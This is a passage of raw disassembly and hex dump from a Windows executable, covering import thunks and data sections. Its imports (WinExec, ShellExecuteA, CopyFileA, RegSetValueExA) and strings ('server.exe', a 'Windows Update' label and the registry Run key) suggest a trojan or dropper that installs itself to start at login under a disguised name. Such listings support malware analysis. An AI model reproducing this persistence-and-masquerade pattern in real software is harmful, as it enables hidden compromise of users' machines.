0x13141733:   be 1c 3c 14 13                  	mov esi, 0x13143c1c
0x13141738:   8b de                           	mov ebx, esi
0x1314173a:   ac                              	lodsb al, byte ptr [esi]
0x1314173b:   3c 00                           	cmp al, 0
0x1314173d:   74 08                           	je 0x13141747 <function_1314171f+0x28>
0x1314173f:   3c 2e                           	cmp al, 0x2e
0x13141741:   75 f7                           	jne 0x1314173a <function_1314171f+0x1b>
0x13141743:   8b de                           	mov ebx, esi
0x13141745:   eb f3                           	jmp 0x1314173a <function_1314171f+0x1b>
0x13141747:   bf 24 3f 14 13                  	mov edi, 0x13143f24
0x1314174c:   8b f3                           	mov esi, ebx
0x1314174e:   ac                              	lodsb al, byte ptr [esi]
0x1314174f:   aa                              	stosb byte ptr es:[edi], al
0x13141750:   3c 00                           	cmp al, 0
0x13141752:   75 fa                           	jne 0x1314174e <function_1314171f+0x2f>
0x13141754:   58                              	pop eax
0x13141755:   5b                              	pop ebx
0x13141756:   5f                              	pop edi
0x13141757:   5e                              	pop esi
0x13141758:   c3                              	ret 
; data inside code section at 0x13141759 -- 0x1314175a
0x13141759:   cc                                                 |.               |
; function: function_1314175a at 0x1314175a -- 0x13141760
0x1314175a:   ff 25 6c 20 14 13               	jmp dword ptr [0x1314206c] <CloseHandle>
; function: function_13141760 at 0x13141760 -- 0x13141766
0x13141760:   ff 25 3c 20 14 13               	jmp dword ptr [0x1314203c] <CopyFileA>
; function: function_13141766 at 0x13141766 -- 0x1314176c
0x13141766:   ff 25 10 20 14 13               	jmp dword ptr [0x13142010] <CreateFileA>
; function: function_1314176c at 0x1314176c -- 0x13141772
0x1314176c:   ff 25 14 20 14 13               	jmp dword ptr [0x13142014] <DeleteFileA>
; function: function_13141772 at 0x13141772 -- 0x13141778
0x13141772:   ff 25 18 20 14 13               	jmp dword ptr [0x13142018] <ExitProcess>
; function: function_13141778 at 0x13141778 -- 0x1314177e
0x13141778:   ff 25 1c 20 14 13               	jmp dword ptr [0x1314201c] <GetCurrentDirectoryA>
; function: function_1314177e at 0x1314177e -- 0x13141784
0x1314177e:   ff 25 20 20 14 13               	jmp dword ptr [0x13142020] <GetFileSize>
; function: function_13141784 at 0x13141784 -- 0x1314178a
0x13141784:   ff 25 24 20 14 13               	jmp dword ptr [0x13142024] <GetModuleFileNameA>
; function: function_1314178a at 0x1314178a -- 0x13141790
0x1314178a:   ff 25 28 20 14 13               	jmp dword ptr [0x13142028] <GetProcessHeap>
; function: function_13141790 at 0x13141790 -- 0x13141796
0x13141790:   ff 25 2c 20 14 13               	jmp dword ptr [0x1314202c] <GetTempPathA>
; function: function_13141796 at 0x13141796 -- 0x1314179c
0x13141796:   ff 25 30 20 14 13               	jmp dword ptr [0x13142030] <HeapAlloc>
; function: function_1314179c at 0x1314179c -- 0x131417a2
0x1314179c:   ff 25 34 20 14 13               	jmp dword ptr [0x13142034] <HeapFree>
; function: function_131417a2 at 0x131417a2 -- 0x131417a8
0x131417a2:   ff 25 38 20 14 13               	jmp dword ptr [0x13142038] <ReadFile>
; function: function_131417a8 at 0x131417a8 -- 0x131417ae
0x131417a8:   ff 25 70 20 14 13               	jmp dword ptr [0x13142070] <RtlZeroMemory>
; function: function_131417ae at 0x131417ae -- 0x131417b4
0x131417ae:   ff 25 40 20 14 13               	jmp dword ptr [0x13142040] <SetFilePointer>
; function: function_131417b4 at 0x131417b4 -- 0x131417ba
0x131417b4:   ff 25 44 20 14 13               	jmp dword ptr [0x13142044] <WinExec>
; function: function_131417ba at 0x131417ba -- 0x131417c0
0x131417ba:   ff 25 48 20 14 13               	jmp dword ptr [0x13142048] <WriteFile>
; function: function_131417c0 at 0x131417c0 -- 0x131417c6
0x131417c0:   ff 25 4c 20 14 13               	jmp dword ptr [0x1314204c] <_lclose>
; function: function_131417c6 at 0x131417c6 -- 0x131417cc
0x131417c6:   ff 25 50 20 14 13               	jmp dword ptr [0x13142050] <_llseek>
; function: function_131417cc at 0x131417cc -- 0x131417d2
0x131417cc:   ff 25 54 20 14 13               	jmp dword ptr [0x13142054] <_lopen>
; function: function_131417d2 at 0x131417d2 -- 0x131417d8
0x131417d2:   ff 25 58 20 14 13               	jmp dword ptr [0x13142058] <_lread>
; function: function_131417d8 at 0x131417d8 -- 0x131417de
0x131417d8:   ff 25 5c 20 14 13               	jmp dword ptr [0x1314205c] <lstrcatA>
; function: function_131417de at 0x131417de -- 0x131417e4
0x131417de:   ff 25 60 20 14 13               	jmp dword ptr [0x13142060] <lstrcmpiA>
; function: function_131417e4 at 0x131417e4 -- 0x131417ea
0x131417e4:   ff 25 64 20 14 13               	jmp dword ptr [0x13142064] <lstrcpyA>
; function: function_131417ea at 0x131417ea -- 0x131417f0
0x131417ea:   ff 25 68 20 14 13               	jmp dword ptr [0x13142068] <lstrlenA>
; function: function_131417f0 at 0x131417f0 -- 0x131417f6
0x131417f0:   ff 25 78 20 14 13               	jmp dword ptr [0x13142078] <ShellExecuteA>
; function: function_131417f6 at 0x131417f6 -- 0x131417fc
0x131417f6:   ff 25 08 20 14 13               	jmp dword ptr [0x13142008] <RegCloseKey>
; function: function_131417fc at 0x131417fc -- 0x13141802
0x131417fc:   ff 25 04 20 14 13               	jmp dword ptr [0x13142004] <RegOpenKeyExA>
; function: function_13141802 at 0x13141802 -- 0x13141808
0x13141802:   ff 25 00 20 14 13               	jmp dword ptr [0x13142000] <RegSetValueExA>

;;
;; Data Segment
;;

; section: .rdata
0x13142000:   fa 22 00 00 ea 22 00 00  dc 22 00 00 00 00 00 00   |."..."..."......|
0x13142010:   76 21 00 00 84 21 00 00  92 21 00 00 a0 21 00 00   |v!...!...!...!..|
0x13142020:   b8 21 00 00 c6 21 00 00  dc 21 00 00 ee 21 00 00   |.!...!...!...!..|
0x13142030:   fe 21 00 00 0a 22 00 00  16 22 00 00 6a 21 00 00   |.!..."..."..j!..|
0x13142040:   32 22 00 00 44 22 00 00  4e 22 00 00 5a 22 00 00   |2"..D"..N"..Z"..|
0x13142050:   64 22 00 00 6e 22 00 00  78 22 00 00 82 22 00 00   |d"..n"..x"..."..|
0x13142060:   8e 22 00 00 9a 22 00 00  a6 22 00 00 5c 21 00 00   |."..."..."..\!..|
0x13142070:   22 22 00 00 00 00 00 00  c0 22 00 00 00 00 00 00   |""......."......|
0x13142080:   e0 20 00 00 00 00 00 00  00 00 00 00 b2 22 00 00   |. ..........."..|
0x13142090:   10 20 00 00 48 21 00 00  00 00 00 00 00 00 00 00   |. ..H!..........|
0x131420a0:   d0 22 00 00 78 20 00 00  d0 20 00 00 00 00 00 00   |."..x ... ......|
0x131420b0:   00 00 00 00 0c 23 00 00  00 20 00 00 00 00 00 00   |.....#... ......|
0x131420c0:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x131420d0:   fa 22 00 00 ea 22 00 00  dc 22 00 00 00 00 00 00   |."..."..."......|
0x131420e0:   76 21 00 00 84 21 00 00  92 21 00 00 a0 21 00 00   |v!...!...!...!..|
0x131420f0:   b8 21 00 00 c6 21 00 00  dc 21 00 00 ee 21 00 00   |.!...!...!...!..|
0x13142100:   fe 21 00 00 0a 22 00 00  16 22 00 00 6a 21 00 00   |.!..."..."..j!..|
0x13142110:   32 22 00 00 44 22 00 00  4e 22 00 00 5a 22 00 00   |2"..D"..N"..Z"..|
0x13142120:   64 22 00 00 6e 22 00 00  78 22 00 00 82 22 00 00   |d"..n"..x"..."..|
0x13142130:   8e 22 00 00 9a 22 00 00  a6 22 00 00 5c 21 00 00   |."..."..."..\!..|
0x13142140:   22 22 00 00 00 00 00 00  c0 22 00 00 00 00 00 00   |""......."......|
0x13142150:   75 73 65 72 33 32 2e 64  6c 6c 00 00 1a 00 43 6c   |user32.dll....Cl|
0x13142160:   6f 73 65 48 61 6e 64 6c  65 00 24 00 43 6f 70 79   |oseHandle.$.Copy|
0x13142170:   46 69 6c 65 41 00 30 00  43 72 65 61 74 65 46 69   |FileA.0.CreateFi|
0x13142180:   6c 65 41 00 53 00 44 65  6c 65 74 65 46 69 6c 65   |leA.S.DeleteFile|
0x13142190:   41 00 80 00 45 78 69 74  50 72 6f 63 65 73 73 00   |A...ExitProcess.|
0x131421a0:   d9 00 47 65 74 43 75 72  72 65 6e 74 44 69 72 65   |..GetCurrentDire|
0x131421b0:   63 74 6f 72 79 41 00 00  f5 00 47 65 74 46 69 6c   |ctoryA....GetFil|
0x131421c0:   65 53 69 7a 65 00 07 01  47 65 74 4d 6f 64 75 6c   |eSize...GetModul|
0x131421d0:   65 46 69 6c 65 4e 61 6d  65 41 00 00 21 01 47 65   |eFileNameA..!.Ge|
0x131421e0:   74 50 72 6f 63 65 73 73  48 65 61 70 00 00 4a 01   |tProcessHeap..J.|
0x131421f0:   47 65 74 54 65 6d 70 50  61 74 68 41 00 00 7f 01   |GetTempPathA....|
0x13142200:   48 65 61 70 41 6c 6c 6f  63 00 83 01 48 65 61 70   |HeapAlloc...Heap|
0x13142210:   46 72 65 65 00 00 f7 01  52 65 61 64 46 69 6c 65   |Free....ReadFile|
0x13142220:   00 00 0b 02 52 74 6c 5a  65 72 6f 4d 65 6d 6f 72   |....RtlZeroMemor|
0x13142230:   79 00 36 02 53 65 74 46  69 6c 65 50 6f 69 6e 74   |y.6.SetFilePoint|
0x13142240:   65 72 00 00 94 02 57 69  6e 45 78 65 63 00 9e 02   |er....WinExec...|
0x13142250:   57 72 69 74 65 46 69 6c  65 00 af 02 5f 6c 63 6c   |WriteFile..._lcl|
0x13142260:   6f 73 65 00 b1 02 5f 6c  6c 73 65 65 6b 00 b2 02   |ose..._llseek...|
0x13142270:   5f 6c 6f 70 65 6e 00 00  b3 02 5f 6c 72 65 61 64   |_lopen...._lread|
0x13142280:   00 00 b5 02 6c 73 74 72  63 61 74 41 00 00 b9 02   |....lstrcatA....|
0x13142290:   6c 73 74 72 63 6d 70 69  41 00 bb 02 6c 73 74 72   |lstrcmpiA...lstr|
0x131422a0:   63 70 79 41 00 00 bf 02  6c 73 74 72 6c 65 6e 41   |cpyA....lstrlenA|
0x131422b0:   00 00 6b 65 72 6e 65 6c  33 32 2e 64 6c 6c 00 00   |..kernel32.dll..|
0x131422c0:   67 00 53 68 65 6c 6c 45  78 65 63 75 74 65 41 00   |g.ShellExecuteA.|
0x131422d0:   73 68 65 6c 6c 33 32 2e  64 6c 6c 00 80 01 52 65   |shell32.dll...Re|
0x131422e0:   67 43 6c 6f 73 65 4b 65  79 00 99 01 52 65 67 4f   |gCloseKey...RegO|
0x131422f0:   70 65 6e 4b 65 79 45 78  41 00 ae 01 52 65 67 53   |penKeyExA...RegS|
0x13142300:   65 74 56 61 6c 75 65 45  78 41 00 00 61 64 76 61   |etValueExA..adva|
0x13142310:   70 69 33 32 2e 64 6c 6c  00 00 ??                  |pi32.dll..?     |
; section: .data
0x13143000:   6f 70 65 6e 00                                     |open.           |   "open"
0x13143005:   64 65 62 75 67 00 00 00  00 00 00 00 00 00 00 00   |debug...........|
0x13143015:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 5c 00   |..............\.|
0x13143025:   73 65 72 76 65 72 2e 65  78 65 00                  |server.exe.     |   "server.exe"
0x13143030:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143040:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143050:   00                                                 |.               |
0x13143051:   72 65 61 64 6d 65 2e 74  78 74 00                  |readme.txt.     |   "readme.txt"
0x1314305c:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x1314306c:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x1314307c:   00 00 00 00 00 00 00 00  00 00                     |..........      |
0x13143086:   65 78 65 00                                        |exe.            |   "exe"
0x1314308a:   01 00 00 00 fd 00 00 00  01 00 00 00 fd 00 00 00   |................|
0x1314309a:   00 00 00 00                                        |....            |
0x1314309e:   50 72 6f 74 65 63 74 20  73 79 73 74 65 6d 00      |Protect system. |   "Protect system"
0x131430ad:   00 00 00 00 00 00                                  |......          |
0x131430b3:   57 69 6e 64 6f 77 73 20  55 70 64 61 74 65 00      |Windows Update. |   "Windows Update"
0x131430c2:   00 00 00 00 00 00                                  |......          |
0x131430c8:   53 4f 46 54 57 41 52 45  5c 4d 69 63 72 6f 73 6f   |SOFTWARE\Microso|   "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
0x131430d8:   66 74 5c 57 69 6e 64 6f  77 73 5c 43 75 72 72 65   |ft\Windows\Curre|
0x131430e8:   6e 74 56 65 72 73 69 6f  6e 5c 52 75 6e 00         |ntVersion\Run.  |
0x131430f6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143106:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143116:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143126:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143136:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143146:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143156:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143166:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143176:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143186:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143196:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x131431a6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x131431b6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x131431c6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x131431d6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x131431e6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x131431f6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143206:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143216:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143226:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143236:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143246:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143256:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143266:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143276:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143286:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143296:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x131432a6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x131432b6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x131432c6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x131432d6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x131432e6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x131432f6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143306:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143316:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143326:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143336:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143346:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143356:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143366:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143376:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143386:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143396:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x131433a6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x131433b6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x131433c6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x131433d6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x131433e6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x131433f6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143406:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143416:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143426:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143436:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143446:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143456:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143466:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143476:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143486:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143496:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x131434a6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x131434b6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x131434c6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x131434d6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x131434e6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x131434f6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143506:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143516:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143526:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143536:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143546:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143556:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143566:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143576:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143586:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143596:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x131435a6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x131435b6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x131435c6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x131435d6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x131435e6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x131435f6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143606:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143616:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143626:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143636:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143646:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143656:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143666:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143676:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143686:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143696:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x131436a6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x131436b6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x131436c6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x131436d6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x131436e6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x131436f6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143706:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143716:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143726:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143736:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143746:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143756:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143766:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143776:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143786:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143796:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x131437a6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x131437b6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x131437c6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x131437d6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x131437e6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x131437f6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143806:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143816:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143826:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143836:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143846:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143856:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143866:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143876:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143886:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143896:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x131438a6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x131438b6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x131438c6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x131438d6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x131438e6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x131438f6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143906:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143916:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143926:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143936:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143946:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143956:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143966:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143976:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143986:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143996:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x131439a6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x131439b6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x131439c6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x131439d6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x131439e6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x131439f6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143a06:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143a16:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143a26:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143a36:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143a46:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143a56:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143a66:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143a76:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143a86:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143a96:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143aa6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143ab6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143ac6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143ad6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143ae6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143af6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143b06:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143b16:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143b26:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143b36:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143b46:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143b56:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143b66:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143b76:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143b86:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143b96:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143ba6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143bb6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143bc6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143bd6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143be6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143bf6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143c06:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143c16:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143c26:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143c36:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143c46:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143c56:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143c66:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143c76:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143c86:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143c96:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143ca6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143cb6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143cc6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143cd6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143ce6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143cf6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143d06:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143d16:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143d26:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143d36:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143d46:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
